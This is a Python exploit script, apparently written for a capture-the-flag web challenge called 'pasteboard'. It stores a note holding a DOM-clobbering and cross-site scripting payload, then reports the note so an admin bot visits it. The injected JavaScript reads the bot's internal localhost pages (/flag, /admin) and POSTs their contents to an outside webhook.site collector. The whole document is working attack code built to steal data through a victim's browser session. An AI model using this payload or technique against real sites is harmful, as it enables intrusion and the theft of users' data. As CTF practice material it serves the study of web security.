import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Try fetching internal endpoints that might have the flag
# Use the bot's perspective (same-origin) to fetch
payload = '''<form id="errorReporter"><input name="path" value="data:text/javascript,
Promise.all([
  fetch('http://127.0.0.1:5000/').then(r=>r.text()),
  fetch('http://127.0.0.1:5000/flag').then(r=>r.text()).catch(e=>'no flag'),
  fetch('http://127.0.0.1:5000/admin').then(r=>r.text()).catch(e=>'no admin'),
  'window: '+Object.keys(window).filter(k=>k.toLowerCase().includes('flag')).join(',')
]).then(results=>fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/ALLFETCH',{method:'POST',body:JSON.stringify({home:results[0].substring(0,500),flag:results[1].substring(0,500),admin:results[2].substring(0,500),windowKeys:results[3]})}))
"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("[*] Trying to fetch internal endpoints from bot's perspective...")
print("[*] Will try: /, /flag, /admin")
print("[*] Also checking window object for flag-related keys")
print()

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Fetch Internal", "body": payload},
    allow_redirects=False
)

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    
    print(f"[+] Created: {note_url}")
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    if report.status_code == 202:
        print(f"[+] Reported!")
        print()
        print("[*] Check webhook for POST to /ALLFETCH with JSON data")
        print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
        print()
        print("[*] Look for the flag in the response body!")